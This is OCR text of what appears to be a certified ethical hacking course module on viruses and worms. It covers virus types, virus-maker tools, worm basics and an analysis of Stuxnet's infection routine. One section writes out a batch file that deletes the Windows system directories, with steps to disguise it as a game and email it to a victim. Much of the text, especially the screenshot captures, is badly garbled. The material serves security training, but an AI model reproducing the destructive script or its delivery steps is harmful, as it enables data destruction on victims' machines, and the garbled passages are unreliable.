If y o u h a ve f o r g o t t e n t h a t t h e e x te n s io n s a re a c t u a lly t u r n e d o ff, y o u m i g h t t h i n k t h is is
a t e x t file a n d o p e n it

0

This is an e x e c u t a b l e V is u a l Basic S c r ip t v i r u s file t h a t c o u ld d o s e rio u s d a m a g e

T h e c o u n t e r m e a s u r e is t o t u r n o f f " H i d e f i l e e x t e n s i o n s " in W i n d o w s , as s h o w n in t h e f o l l o w i n g
scree nsh ot:



Viruses and W orm s


Folder O ptions
General View

Search

Folder views
You can apply the view (such as Detate or Icons) that
you are usng for this folder to al folders of ths type.
Apply to Folders

Reset Folders

Advanced settngs
Frfesand Folders
H I Always show icons, never thumbnate
(‫ )־־‬Always show menus
@ Display f<e icon on thumbnab
@ Display W size *formation n folder tps
e
□ Display the h i path n the Mle bar
i i Hidden Mes and folders
O Don‫ ז‬show hdden Wes. folders, or drrves
(•) Show hrfdenMes. folders, and dnves
V hfcde empty dnves n the Computer folder
□ HkJe exlenswns for known Me types
y . Ude folder merge corftcts
J c a orc fa u lts
OK

Cancel

App*y

FIGURE 7.17: Uncheck Hide File Extensions



Viruses and W orm s


“
■on and Intrusive Viruses
Add-On
V iru ses

c EH

(crtifwd

IU mjI NMhM

Add-on viruses append theircode to the host code without making any changes
to the latter or relocate the host code to insert their own code at the beginning
Original Program
Original Program
Original Program
J.V R
M ..

I I I I I I I I I I I I I I I I I I I I
viral code

V iru ses

Original Program

Original Program

Copyright © by E&Cauactl. All Rights Reserved. Reproduction is Strictly Prohibited

A d d-o n a n d In tru s iv e V iru s e s
Add-on Viruses
M o s t v iru s e s a re a d d - o n v iru s e s . T his t y p e o f v ir u s a p p e n d s its c o d e t o t h e b e g in n in g
o f t h e h o s t c o d e w i t h o u t m a k in g a n y c h a n g e s t o t h e l a t t e r . T hu s , t h e v ir u s c o r r u p t s t h e s t a r t u p
i n f o r m a t i o n o f t h e h o s t c o d e , a n d places it s e lf in its p la ce, b u t it d o e s n o t t o u c h t h e h o s t co d e .
H o w e v e r , t h e v ir u s c o d e is e x e c u t e d b e f o r e t h e h o s t c o d e . T h e o n l y in d i c a t i o n t h a t t h e f ile is
c o r r u p t e d is t h a t t h e size o f t h e file has in c re a s e d .
A d d -o n

Viruses
Original Program
Original Program

1
1
—

1

. .

^
................................................................................ JUMP.
FIGURE 7.18: Working of Add-on Viruses



Viruses and W orm s


Intrusive Viruses
In tr u s iv e v iru s e s o v e r w r i t e t h e i r c o d e e i t h e r b y c o m p l e t e l y r e m o v i n g t h e t a r g e t h o s t's
p r o g r a m c o d e o r s o m e t i m e s o v e r w r i t i n g o n l y p a r t o f it. T h e r e f o r e , t h e o r i g i n a l c o d e is n o t
e x e c u te d p r o p e r ly .

Original Program

Original Program

FIGURE 7.19: Working of Intrusive Viruses



Viruses and W orm s


Transient and Terminate and
Stay Resident Viruses

EH

Basic In fe c tio n T echniques
A

.

Direct Action
or Transient Virus

J

the controls
of the host code to where

Terminate and Stay
Resident Virus (TSR)

f

Remains permanently in
the memory during the

t

I] resides

J Selects the target program
to be modified and

J

^___

^

entire work session even
after the target host's
program isexecuted and
terminated; can be
removed only by


T r a n s i e n t a n d T e r m i n a t e a n d S ta y R e s i d e n t V i r u s e s
Transient Viruses
T r a n s ie n t v iru s e s t r a n s f e r all c o n t r o l t o t h e h o s t c o d e w h e r e t h e y re s id e , s e le c t t h e
t a r g e t p r o g r a m t o be m o d i f i e d , a n d c o r r u p t it.

Term inate and Stay Resident V irus (TSR)
TSR v iru s e s r e m a i n p e r m a n e n t l y in m e m o r y d u r in g t h e e n t i r e w o r k se s s io n , e v e n a f t e r
t h e t a r g e t h o s t p r o g r a m is e x e c u t e d a n d t e r m i n a t e d . T h e y can be r e m o v e d o n l y b y r e b o o t i n g
t h e s y s te m .



Viruses and W orm s


W riting a Sim ple Virus Program

C EH

Send the Game.com file
as an email attachment
to a victim
Create a batch file Game.bat
with this text

0 echo off
del c:winntsystem32*.*
del c :winnt*.*

Convert the Game.bat
batch file to Game.com
using bat2com utility

When run it deletes core
files in the WINNTdirectory
making Windows unusable ,

Copyright © by E&
Caincil. All Rights Reserved. Reproduction is Strictly Prohibited.

W ritin g a S im p le V iru s P r o g r a m
-------

For d e m o n s t r a t i o n p u r p o s e s , a s im p le p r o g r a m t h a t can be u sed t o ca use h a r m t o a

t a r g e t s y s te m is s h o w n h e re :
1.

C re a te a b a tc h file G a m e . b a t w i t h t h e f o l l o w i n g t e x t :

text @ echo off
delete c:winntsystem32*.*
delete c:winnt*.*
2.

C o n v e r t t h e G a m e . b a t b a tc h f ile t o G a m e . c o m u s in g t h e b a t 2 c o m u t i l i t y

3.

A ssign Icon t o G a m e . c o m u s in g W i n d o w s file p r o p e r t ie s scree n

4.

Send t h e G a m e . c o m f ile as an e m a il a t t a c h m e n t t o a v i c t i m

5.

W h e n t h e v i c t i m r u n s t h is p r o g r a m , it d e le t e s c o re file s in t h e W I N N T d ir e c t o r y , m a k in g
W i n d o w s u n u s a b le

T h e v i c t i m w o u l d h a ve t o r e i n s t a l l W i n d o w s , c a u s in g p r o b l e m s t o a lr e a d y sa ved files.



Viruses and W orm s


Terabit Virus Maker
‫וי! וי־•• י י‬

‫. ״י‬I ‫! ־ז־‬

M Disable W indow s Security Center

^ H ^ i d Opening Copy,Move Window

|

Avoid Opening Gpedit ^

'M Disable W indow s Them es

Avoid Opening Media Player |

|

Format All Hard Drives

Avoid Opening Mozilla Firefox ^

^

Funny Keyboard

Avoid Opening M sConfig ^

|

Funny M ouse

Avoid Opening Notepad ^

|

Funny Start Button

M Avoid Opening Wordpad

M Gradually Fill System Volum e

Avoid Opening Yahoo M esseng er ^

Disable W indow s Security Essentials

Hide Desktop Icons

Add 30 User Accounts to W indow s ^

M Hide Folder Option Menu

Always Clean Clipboard ^

|

Hide Taskbar

Alw ays Log Off ^

|

Lock All D rives/old ers

M Close Internet Explorer Every 10 Sec 0
M Delete All Files In Desktop

|

Delete All Files In My Documents ^
Delete W indow s Fonts
H

Delete W indow s Screen Savers

Lock Internet Explorer Option Menu
Mute System Volum e
Open/Close CD-ROM Every 10 Sec

|

Play B eep Sound Every Sec

M Rem ove Desktop Wallpaper

f | Disconnect From Internet

B

Rem ove Run From Start Menu

Disable Automatic Updates ^

|

Rem ove Start Button

Disable Command Prompt ^

0

Rem ove W indow s Clock

Disable Printer
Disable Regedit ^
Disable Screen Saver ^
M Disable System Restore
Disable Task Manager

Slow Down PC Speed
f l Spread with Floppy , Folders
0

Stop SQL Server

M Swap M ouse Buttons
B

Transparent Explorer W indows

Disable W indow s Firewall ^

^

Turn off Computer After 5 Mm

Disable W indow s Installer ■

t f Turn Off Monitor

|| Q sp m‫׳‬uQm2
ia ie
0

■ lnLU °« COUJbCopyright © by E(

T e ra B IT V iru s M a k e r
T e ra B IT V ir u s M a k e r is a v ir u s t h a t is m o s t l y d e t e c t e d b y all a n t i v i r u s s o f t w a r e w h e n
s c a n n e d . T his v ir u s m o s t l y d o e s n ' t h a r m t h e PC, b u t it can d is a b l e t h e a n t i v i r u s t h a t is in s ta lle d
o n t h e s y s te m f o r a s h o r t t i m e .



Viruses and W orm s


•• TeraBn Virus Maker 3
.
■ Avoid Opening Calculator

H

M Avoid Opening Copy,M ove W indow
Avoid Opening Gpedit

H

| Disable W indow s Security Essentials
J f Disable W indow s Them e s

H Avoid Opening Media Player
Avoid Opening Mozilla Firefox

jfl Form at All Hard Drives
H Funny Keyboard

M

Avoid Opening MsConfig
Avoid Opening Notepad

H
^

H

Avoid Opening Wordpad
Avoid Opening Yahoo M essenger
M A d d JO User Accounts to W indow s

3

| Close Internet Explorer Every
M Delete All Files In Desktop

ft Gradually Fill System Volum e
J Hide Desktop Icons
M Hide Folder Option Menu

1 Sec £
0

Ru n C u s to m C o m m an d

Lock Internet Explorer Option Menu

M Mute System Volum e

10Sec

Delete W indow s Fonts

J | Open/Close CD-ROM Every
M Play Beep Sound Every Sec

Delete W indow s Screen Savers

'/I Rem ove Desktop Wallpaper

M Delete All Files In My Documents

0

Funny Mouse
Funny Start Button

^ Hide Taskbar
M Lock All Drives,Folders

M Alw ays Clean Clipboard
M Alw ays Log Off

Disable W indow s Security C enter

M Disconnect From Internet

^

Rem ove Run From Start Menu

^

Disable Automatic Updates

H

Disable Com m and Prompt

F Name After Instal
ie

Rem ove Start Button

B

fake KB(s) to virus.

| Disable Printer
M Disable Regedit

0
H

Disable Screen Saver
Disable System Restore

Q Disable Task Manager
M Disable W indow s Firewall
■

Disable W indow s Installer

£

Rem ove W indow s Clock

f

Slow Down PC Speed

|

Swap Mouse Buttons

Cl Spread with Flo pp y, Folders
U S«>P SQL Server
0

Fie Name

exe B

jf l Run Virus with W indows

Transparent Explorer W indow s
T u rn off Com pu te r After Min

Cr eat e Vi rus

|
■

Tu rn Off Monitor

About

5

x
t

E

FIGURE 7.20: TeraBIT Virus Maker



Viruses and W orm s


JPS Virus M aker and DELmE's
Batch Virus M aker
IP (Vu Mkr3 )
S ir s a e .0

n co ?‫| *ץי‬O rO o
f to < ‫ נ‬V p r
e
‫י‬
0 ie b s
Me ncs
t lceu
c
e
®ciofl 1Sa UwB n QneUrpord
et o
w
p jlos iag s « rr |
> h
n
Sa LclD | Sa W Ugc Oe14D T»|
pmoa a
k ( * * tSx pn0c a «
3 ka
RstTe
ee «
n
SaPre |
paat r
Py nPoo
bWXSn
N SnSa | * e riffte Cr eF &e»n|
e edpm
t
dU
oto ie 4n3s
BeSre O e HeDcnrsFld
U cen fDih| M ouet oe
r
H. .Pt |
i* M
f
O • D M | DcoJT M
fe # o m etA 4 m
c
Mt•il XlFa | D t M.M Fa
e A mf
a ee p f
le 3 e
M(• l Pg m | D t M be Im
e A hM e e eF
le
TeL*Rsat 1 DMtWl
h a etr
ee d
D t M ouet D t M uc
e e y cms1 e e yM
le D n
le n

D t HPfM |
ae r m
la
Dls« **>«|
a tM
D t *Is*M |
ee
la
m
C A c is |
ra Crp
DMMPan |
c e yc u

! ‫ זיי‬FtcioTDa MM(
‫ יח‬roano « * g
‫״‬
*
(M•| d
a v
t
‫יין‬
Mte | |tf
a fr
l«
”
O t | |nl
a e «f
la

0 FV»ta<

O Loo Off

V 5A rIr^ I I ‫יייי‬
r* 'le H

0 Turn Off

O Hibiinofco

0 No‫־׳‬e

fl Sre Nm I^ o o ^
evr a o rd T x -H

0WNea
» • opd
t
D t C utr |
e ea la
la lc o
D t Acm
e ect
le

O ttP l
M v
IMt.U•
- c(

(M•|
M
D» |
*a
Mt• |
a
D i•od |
a W
la DtO a
e eu k
la llo
0* S
* e rf» |

wfig y o c m
g fe y o
w & cm
o|

9
0
0

J P S V iru s M a k e r

D E L m E 's B a tc h V iru s M a k e r

Copyright @ by E lrC lM K i. All Rights Reserved. Reproduction is Strictly Prohibited.

JP S V i r u s M a k e r a n d D E L m E 's B a t c h V i r u s M a k e r
JP S Virus M a k e r
JPS V ir u s M a k e r is a t o o l t o c r e a t e v ir u s e s . It a lso has a f e a t u r e t o c o n v e r t a v ir u s i n t o
a w o r m a n d can be u sed t o d is a b l e t h e n o r m a l h a r d w a r e o f t h e s y s te m .



Viruses and W orm s


3PS ( V iru s M a k e r 3.0 )

‫ם‬

Disable R e?sby

□ Hrie ServKet

□

Disable MsCortig

□

Hide Outlook E *p te u

□

Disable T a t* Manager

□

H d e W n d o w s Clock

□

Disable Yahoo

□

Hide Desktop Icon*

□

Disable M e d a Pa^ei

□

H id e A IP io c c e s s n Taskmgi

□

Disable Internet Explore!

□

Hide A l Tasks n Taskmgi

□

Disable T m e

Q Hide R m

□

Disable Gk x «> Pokey

□ Change Explorer Caption

□

Disable W n d o w s Explorer

□

□

Disable Norton Anb V iu s

□

□

Disable M cAtee Anb V iu s

□

Remove Folder Options

□

Disable Note Pad

□

Lock Mouse & Keyboard

□

Disable W a d Pad

□

M ute Sound

□

Disable W nd o w s

□

Alw ays C D flO M

□

Disable DHCP d e n t

O T u n O H M o n to r

□

Disable Taskbai

□

C ta jy Mouse

□

Disable Start Button

□

Destroy T askbat

□

Disable MSN Messengei

□

Destroy OIBnes (VM essengetl

□

Disable CMD

□

Destroy Protected Stiotage

□

Disable S e c u iy Center

□

Destroy A u d o Service

□

Disable System R e s id e

□

Destroy Clpboerd

□

Disable Control Panel

□

T e<m»Mle W n d o r n

□

Disable Desktop Icons

□

Hide C usot

□

Disable S a e e n Save*

□ Auto Startup

O Restart

O Log OH

Name A fter In sta l: Ru n d i3 ;

Clear W n d o m X P
Swap Mouse Batons

O T u n OH

O Htm nate

Server Name:

O None

Sende1 .exe

JPS V tn u M aker 3 0

FIGURE 7.21: JPS Viruse Maker Screenshot

D E Lm E 's Batch Virus M a k e r
( / A

1

DELmE's Ba tch V ir u s M a k e r is a s im p le t o o l t h a t a llo w s y o u t o c r e a te y o u r o w n c h o ic e

o f b a t file v iru s e s t o s u it y o u r tasks.
^LJxj
‫ יי‬Oang• Uaar PaMword To qwarty
I uaar *ujeememe"■. Qwwfy

Swp Mau— Buaong | Oanga Uwr Paa—o>d|
‫׳‬w* Crtah
•tMartCorrpa•‫׳‬
co ~%0>xn*>b*
<»t ‫ ־‬VOxratftM
‫־‬
•cto
•cto M r 0 ‫> ־‬xraM>bM
•tMart *0‫>׳־־‬cra*fb«
coart '0. ‫ >־‬a a * M
H t
a
*t*tart‫’ ־־‬OXhM
t
o *»
9tHart %0 .xMb
CK “‫>>־‬cr»M1bM
•oart ~ XO»cr»*bM
c
•cto M
•t■art 0O»0 a * bM
coart ‫ »־־ ־‬a a#1b«
*
•cto

Sp—

HMSatoSg—

|

M
agBo | OpfvOoe•
a

HfrVhaW a

|

H»B— cna|

B u iS a M n O ID i* I *da Docunarta FaUar I

Oa>»• H OocFtea

O l t H Tm Hm
aao

CMcca*

•cto H r ‫ ) * ־‬xyaah bM
at ‫ ־‬U>
•cto *at" 0» a W 1M
tr
•cto M r %0 ‫» ־‬cra#1b l
at
‫־‬
a
•cto iat“ %0»cr«#1 b «
tr
a
•cto M r %0 ‫» ־‬aa*1 bM
at
‫־‬
•cto M r “ %0>x7aM3bM
at
•cto M r %0 ‫> י‬x7a#t b t
at
‫־‬
a
•cto M r %0 ‫» ־‬a*tftbai
at
M r craihbal
at

CM•

0«— * PhgFlw |
T>» La* Rx i

|

OMta% Oocu-rt■ |

|

H* O Fte• I

DM» H fa tftw

Itwf |

I t * Ud P*

O f t H Ptf F a
aaa
Ia
DcMe

M»*>4F«m

| O a fc-* LrfcF—

Pa*al» Hal & | C > Compuar
r»M

0*i«% H um c

I

| C W k% Plcfcw

|
|
|

O tF jp
riM M •
N o t Fie E
jecnaon To Ortete leg '6 0

r^r
0Mart *“ XO>>^SyMamO‫״‬v*‘-»AUTO€XEC RAT

******

pgJ o
ugbT

V wqwrt |
WA» 1

►‫ • ״י ס‬Wtw cw
* ‫חיי‬My y o
j

Chang• How Pag•

goo^• co*H

Qpan Wab P«g»

FIGURE 7 .2 2 : DELmE's B a tch V iru s M a k e r S c re e n s h o t


Ethical Hacking and C ounterm easures Copyright © by EC-COlMCil

Viruses and W orm s


M odule Flow

CEH

V iru s and
W orm s
C on cep ts

Types o f
V iruses

P en etratio n
Testing

I

C ounter•
m easures

M a lw a re
Analysis

Copyright © by E&

M o d u le F lo w
P r io r t o th is , w e

h a ve

d iscu sse d v a r io u s ty p e s

o f v iru s e s .

Now

we

w i ll discuss

c o m p u t e r w o r m s a n d h o w t h e y a re d i f f e r e n t f r o m viru s e s .

V iru s a n d W o rm s C o nc e p t

M a lw a r e A nalysis

T yp es o f V iruses


<4
/

—


^

)


•V —

This s e c tio n d e s c r ib e s w o r m s , w o r m a na lys is (S tu x n e t) , a n d a w o r m m a k e r ( I n t e r n e t W o r m
M a k e r T h in g ).



Viruses and W orm s



CEH

Computer worms are malicious programs that
replicate, execute, and spread across the network
connections independently without human
interaction

Most of the worms are created only to replicate and
spread across a network, consuming available
computing resources; however, some worms carry a
payload to damage the host system

Attackers use worm payload to install backdoors in
infected computers, which turns them into zombies
and creates botnet; these botnets can be used to
carry further cyber attacks

0

-C

—

‫׳״ —יי‬

C o m p u t e r w o r m s a re m a l i c io u s p r o g r a m s t h a t r e p lic a te , e x e c u te , a n d s p re a d across

n e t w o r k c o n n e c t i o n s i n d e p e n d e n t l y , w i t h o u t h u m a n i n t e r a c t i o n . M o s t w o r m s a re c r e a t e d o n l y
t o r e p lic a te a n d s p re a d acro ss a n e t w o r k , c o n s u m i n g a v a ila b le c o m p u t i n g re s o u r c e s ; h o w e v e r ,
s o m e w o r m s c a r r y a p a y lo a d t o d a m a g e t h e h o s t s y s te m .
A w o r m d o e s n o t r e q u i r e a h o s t t o r e p li c a t e , a lt h o u g h in s o m e cases o n e m a y a rg u e t h a t a
w o r m ' s h o s t is t h e m a c h in e it has i n f e c t e d . W o r m s a re a s u b t y p e o f v iru s e s . W o r m s w e r e
c o n s id e r e d

m a in ly

a m a in fra m e

p ro b le m ,

but

a fte r

m ost

o f th e

w o rld 's

s y s te m s

w ere

i n t e r c o n n e c t e d , w o r m s w e r e t a r g e t e d a g a in s t t h e W i n d o w s o p e r a t i n g s y s te m , a n d w e r e s e n t
t h r o u g h e m a il, IRC, a n d o t h e r n e t w o r k f u n c t io n s .
A t t a c k e r s use w o r m p a y lo a d s t o in s ta ll b a c k d o o r s in i n f e c t e d c o m p u t e r s , w h i c h t u r n s t h e m i n t o
z o m b ie s a n d c r e a te s b o t n e t ; th e s e b o tn e ts can be used to carry o u t fu r t h e r cyber-attacks.



Viruses and W orm s


How Is a W orm D ifferen t from
a V irus?

Replicates on its own
A worm takes advantage of file
or information transport
features on computer systems
and spreads through the
infected network automatically

A worm is a special type of virus
that can replicate itself and use
memory, but cannot attach itself
to other programs

but a virus does not

Spreads through the
Infected Network
4 • »


H ow Is a W o rm D iffe re n t fro m a V iru s?
V ir u s

W o rm

A v ir u s is a file t h a t c a n n o t be s p re a d t o o t h e r

A w o r m , a f t e r b e in g i n s t a l l e d o n a

c o m p u t e r s u n le ss an i n f e c t e d file is r e p l i c a t e d

s y s te m , can r e p lic a t e it s e lf a nd

a n d a c tu a lly s e n t t o t h e o t h e r c o m p u t e r ,

s p re a d b y u sin g IRC, O u t l o o k , o r

w h e re a s a w o r m does ju s t th e o p p o s ite .

o t h e r a p p lic a b le m a ilin g p r o g r a m s .

Files such as .c o m , .exe, o r .sys, o r a

A w o r m ty p ic a lly does n o t m o d ify

c o m b i n a t i o n o f t h e m a re c o r r u p t e d o n c e t h e

any sto re d pro gram s.

v ir u s r u n s o n t h e s y s te m .
V iru s e s a re a l o t h a r d e r t o g e t o f f an in f e c te d

As c o m p a r e d t o a v iru s , a w o r m can

m a c h in e .

be e a s ily r e m o v e d f r o m t h e s y s te m .

T h e ir s p r e a d in g o p t i o n s a re m u c h less t h a n

T hey have m o re s p re a d in g o p tio n s

t h a t o f a w o r m b e c a u s e v iru s e s o n l y i n f e c t

t h a n a v iru s .

fi l e s o n t h e m a c h in e .
TABLE 7.1: Difference between Virus and Worms



Viruses and W orm s


W o rm A n a ly s is : S tu x n e t
Stuxnet isa threat targeting a specific industrial control system likely in Iran, such as a g pipeline
as
or power plant

0

-

0

J The goal of Stuxnet isto sabotage that facility by reprogram ing program able log controllers
m
m
ic
(P C to operate as the attackers intend them to, m likely out of their specified boundaries
L s)
ost

0

0

S tu x n e t c o n ta in s m a n y fe a tu re s s u c h a s:

♦
1

Self-replicates through removable drives exploiting a
vulnerability allowing auto-execution

Updates itself through a peer-to-peer mechanism
within a LAN

2

Spreads in a LAN through a vulnerabilityinthe
Windows Print Spooler

Exploits a total of four unpatched Microsoft
vulnerabilities

Spreads through SMB by exploiting the Microsoft
Windows Server Service RPC Handling Remote Code
Execution Vulnerability

8

Copies and executes itself on remote computers
through network shares running a WinCC
database server

Contacts a command and control server that
allows the hacker to download and execute code,
including updated versions
Contains a Windows rootkit that hide its binaries
and attempts to bypass security products

Copies itself into Step 7 projects in such a way that
it automatically executes when the Step 7 project is
loaded

1 0

Fingerprints a specific industrial control system and
modifies code on the Siemens PLCs to potentially
sabotage the system
h ttp ://w w w .sy m a n te c .co m

-C

S o u rc e : h t t p : / / w w w . s y m a n t e c . c o m
S t u x n e t is a c o m p le x t h r e a t a n d m a l w a r e w i t h d iv e rs e m o d u l e s a n d f u n c t io n a l it ie s . T his is
m o s t l y u se d t o g ra b t h e c o n t r o l a n d r e p r o g r a m i n d u s t r i a l c o n t r o l s y s t e m s (ICS) b y m o d if y in g
c o d e o n p r o g r a m m a b l e lo g ic c o n t r o l l e r s (PLCs), w h i c h c r e a te a w a y f o r t h e a t t a c k e r t o i n t r u d e
i n t o t h e c o m p l e t e s y s te m a n d la u n c h an a t t a c k by m a k in g c h a n g e s in t h e c o d e a n d ta k e
u n a u t h o r i z e d c o n t r o l o n t h e s y s te m s w i t h o u t t h e k n o w l e d g e o f t h e o p e r a t o r s .
S t u x n e t c o n ta in s m a n y f e a t u r e s such as:
e

S e lf- re p lic a te s

th ro u g h

re m o v a b le

d r iv e s

e x p lo itin g

a v u ln e ra b ility

a ll o w i n g

a u to -

e x e c u tio n
Q

S p re a d s in a LAN t h r o u g h a v u l n e r a b i l i t y in t h e W i n d o w s P r i n t S p o o l e r

Q

S p re a d s t h r o u g h S M B b y e x p l o i t i n g t h e M i c r o s o f t W i n d o w s S e rv e r S ervice RPC H a n d lin g
R e m o t e C od e E x e c u tio n V u l n e r a b i l i t y

©

C op ies a n d e x e c u te s it s e lf o n r e m o t e c o m p u t e r s t h r o u g h n e t w o r k s h a re s r u n n i n g a
W in C C d a t a b a s e s e r v e r


Ethical Hacking and C ounterm easures Copyright © by EC-C0linCil

Viruses and W orm s

9


C op ies i t s e lf i n t o S te p 7 p r o je c t s in such a w a y t h a t it automatically executes w h e n t h e
S te p 7 p r o je c t is lo a d e d

9

U p d a t e s it s e lf t h r o u g h a p e e r - t o - p e e r m e c h a n is m w i t h i n a LAN

9

E x p lo its a t o t a l o f f o u r u n p a t c h e d M i c r o s o f t vulnerabilities

9

C o n ta c ts a c o m m a n d

a n d c o n t r o l s e r v e r t h a t a llo w s t h e

hacker to d o w n lo a d

a nd

e x e c u te c o d e , i n c lu d in g u p d a t e d v e rs io n s

9

Contains a Windows rootkit that hide its binaries and attempts to bypass security
products

9

F in g e r p r in t s a s p e c ific industrial control system a n d modifies code on t h e S ie m e n s PLCs
t o p o t e n t i a l l y s a b o ta g e t h e s y s te m



Viruses and W orm s


( C o n t ’d )

W injecting into atrusted p cess,
hen
ro
S
tuxnet m keep the injected code inthe
ay
trusted pro or instruct the trusted
cess
processto inject the code into another
currently ru n g p cess
n in ro

CEH

S
tuxnet c n
o sists of a large .dll file that
contains m different exports an
any
d
resources and two encrypted
configuration b cks
lo

W
henever an export iscalled,
Stuxnet typically injects the entire
D Linto another p
L
rocess and then
just c the particular export
alls

The dropper com
ponent ofStuxnet is
aw
rapper programthat contains all
of the above com
ponents stored
in e itself in a section nam "stub"
sid
e

Stuxnet hook Ntdll.dll to m
onitor for
dB*!
requ to load specially crafted file <
ests
‫ך‬
nam these specially craftedfilenam
es;
es
are m
apped to another locationinstead
- a locationspecified b W
y 32.Stuxnet

W the threat isexecuted, the
hen
w
rapper extractsthe .d file fromthe
ll
stu section, m it into m ory a a
b
aps
em
s
m
odule, and c one of the exports
alls

q

q

It u e a sp
s s ecial m
ethod d ned to b
esig
ypass
behavior blocking and host intrusion-protection
based technologiesthat m
onitor LoadLibrarycalls

W lH k tiH W
h ttp :/ / w w w .s y m a n te c .co m

Copyright © by E&Coincil. All Rights Reserved. Reproduction is Strictly Prohibited.

W o r m A n a l y s i s : S t u x n e t ( C o n t ’d )
S o u rc e : h t t p : / / w w w . s y m a n t e c . c o m
S t u x n e t c o n s is ts o f a la rg e .dll file t h a t c o n t a in s m a n y d i f f e r e n t e x p o r t s a nd r e s o u r c e s a n d t w o
e n c r y p t e d c o n f i g u r a t io n

blo cks. It h o o k s N t d ll . d l l t o m o n i t o r f o r r e q u e s ts t o lo a d s p e c ia lly

c r a f t e d f ile n a m e s ; th e s e s p e c ia lly c r a f t e d f i l e n a m e s a re m a p p e d t o a n o t h e r l o c a t io n in s te a d , a
l o c a t io n s p e c ifie d by W 3 2 . S t u x n e t . T h e d r o p p e r c o m p o n e n t o f S t u x n e t is a w r a p p e r p r o g r a m
t h a t c o n t a in s all c o m p o n e n t s s t o r e d in s id e i t s e lf in a s e c tio n n a m e " s t u b . " W h e n t h e t h r e a t is
e x e c u te d , t h e w r a p p e r e x tr a c ts t h e .dll file f r o m t h e s tu b s e c tio n , m a p s it i n t o m e m o r y as a
m o d u l e , a n d calls o n e o f t h e e x p o r ts . W h e n e v e r an e x p o r t is c a lle d , S t u x n e t t y p i c a l l y in je c ts th e
e n t i r e DLL i n t o a n o t h e r p ro c e s s a n d t h e n j u s t calls t h e p a r t i c u l a r e x p o r t . W h e n i n j e c t i n g i n t o a
t r u s t e d p ro ce ss, S t u x n e t m a y k e e p t h e i n je c te d c o d e in t h e t r u s t e d p ro c e s s o r i n s t r u c t t h e
t r u s t e d p ro c e s s t o i n j e c t t h e c o d e i n t o a n o t h e r c u r r e n t l y r u n n i n g p ro ce ss. It uses a sp ecial
m e t h o d d e s ig n e d t o b ypass b e h a v i o r b lo c k in g a n d h o s t i n t r u s i o n - p r o t e c t i o n based te c h n o l o g i e s
t h a t m o n i t o r Load L ib ra r y calls.



Viruses and W orm s



c EH

fertNM [U*4 H
akM

( C o n t ’d )
Check CFG

Infects
removable
drives

Infection
Routine Flo w

Inject in service,
call export 32

Infects
Step 7
projects

Inject in Step 7
& call export 32

......... A..........
Create
global m utexes

--------* -------Hides
malicious
files

Create rootkit
service reg keys

Inject in Step 7 &
call export 32

Set file tim es

Exit

*
Create global mutex
Decrypt resource 201
& 242 & w rite to disk

C re ate .p n f &
■ files
cfe

Rootkit files
V

>‫׳‬
1

M rxd s.sys

M rxcls.sys

------------- * ------------Version OK

Date<06/24/2012

Decrypt & load self
from disk. Call export
6 - get version

Compare running
version number and
version on disk

h ttp ://w w w .sy m a n te c .co m


W o r m A n a l y s i s : S t u x n e t ( C o n t ’d )
S o u rc e : h t t p : / / w w w . s y r n a n t e c . c o m

I n f e c tio n R o u tin e F lo w
S t u x n e t ch e c k s if it has a d m i n i s t r a t o r r ig h ts o n t h e c o m p u t e r . S t u x n e t w a n t s t o ru n
w i t h t h e h ig h e s t p r iv ile g e p o s s ib le so t h a t it has p e r m is s io n t o t a k e w h a t e v e r a c tio n s it likes o n
t h e c o m p u t e r . If it d o e s n o t h a v e A d m i n i s t r a t o r r ig h ts , it e x e c u te s o n e o f t h e t w o z e r o - d a y
e s c a la tio n o f p r iv ile g e a tta c k s d e s c r ib e d in t h e f o l l o w i n g d ia g r a m .
If t h e p ro c e s s a lr e a d y has t h e r ig h ts it r e q u ir e s , it p r o c e e d s t o p r e p a r e t o call e x p o r t 16 in t h e
m a in .dll file . It calls e x p o r t 16 b y u sin g t h e in j e c t i o n t e c h n i q u e s d e s c r ib e d in t h e I n je c tio n
T e c h n i q u e s e c tio n .
W h e n t h e p ro c e s s d o e s n o t h a v e a d m i n i s t r a t o r r ig h ts o n t h e s y s te m , it tr i e s t o a t t a in th e s e
p riv ile g e s by u sin g o n e o f t w o z e r o - d a y e s c a la t io n o f p riv ile g e a tta c k s . T h e a t t a c k v e c t o r u sed is
b ase d o n t h e o p e r a t i n g s y s te m o f t h e c o m p r o m i s e d c o m p u t e r . If t h e o p e r a t i n g s y s te m is
W i n d o w s V ista , W i n d o w s

7, o r W i n d o w s S e rv e r 2 0 0 8

R2, t h e

c u rre n tly

u n d is c lo s e d Task

S c h e d u le r E sca la tio n o f P riv ile g e v u l n e r a b i l i t y is e x p l o i t e d . If t h e o p e r a t i n g s y s te m is W i n d o w s
XP, t h e c u r r e n t l y u n d is c lo s e d w in 3 2 k .s y s e s c a la t io n o f p r iv ile g e v u l n e r a b i l i t y is e x p l o i t e d .



Viruses and W orm s


If e x p l o i t e d , b o t h o f th e s e v u ln e r a b i l it ie s r e s u lt in t h e m a in .dll file r u n n i n g as a n e w pro ces s,
e i t h e r w i t h i n t h e csrss.exe p ro c e s s in t h e case o f t h e w in 3 2 k .s y s v u l n e r a b i l i t y o r as a n e w ta s k
w i t h a d m i n i s t r a t o r r ig h t s in t h e case o f t h e Task S c h e d u le r v u ln e r a b i l it y .
T h e c o d e t o e x p l o i t t h e w in 3 2 k .s y s v u l n e r a b i l i t y is s t o r e d in r e s o u r c e 2 50 . D e ta ils o f t h e
W in 3 2 k .s y s V u l n e r a b i l i t y a n d t h e Task S c h e d u le r v u l n e r a b i l i t y c u r r e n t l y a re n o t re le a s e d as
p a tc h e s a re n o t y e t a v a ila b le .
A f t e r e x p o r t 15 c o m p le t e s t h e r e q u i r e d ch ecks, e x p o r t 16 is ca lle d .
E x p o r t 16 is t h e m a in in s t a l l e r f o r S t u x n e t. It ch e cks t h e d a t e a n d t h e v e r s io n n u m b e r o f t h e
c o m p r o m i s e d c o m p u t e r ; d e c r y p ts , c r e a te s , a n d in s ta lls t h e r o o t k i t file s a n d r e g is t r y keys; in je c ts
it s e lf i n t o t h e s e rv ic e s .e x e p ro c e s s t o in f e c t r e m o v a b l e d riv e s ; in je c ts i t s e lf i n t o t h e S te p 7
p ro c e s s t o in f e c t all S tep 7 p r o je c ts ; sets u p t h e g lo b a l m u t e x e s t h a t a re used t o c o m m u n i c a t e
b e t w e e n d i f f e r e n t c o m p o n e n t s ; a n d c o n n e c t s t o t h e RPC s e rv e r.
E x p o r t 16 f i r s t ch e c k s t h a t t h e c o n f i g u r a t i o n d a ta is v a lid , a f t e r t h a t it c h e c k s t h e v a lu e " N T V D M
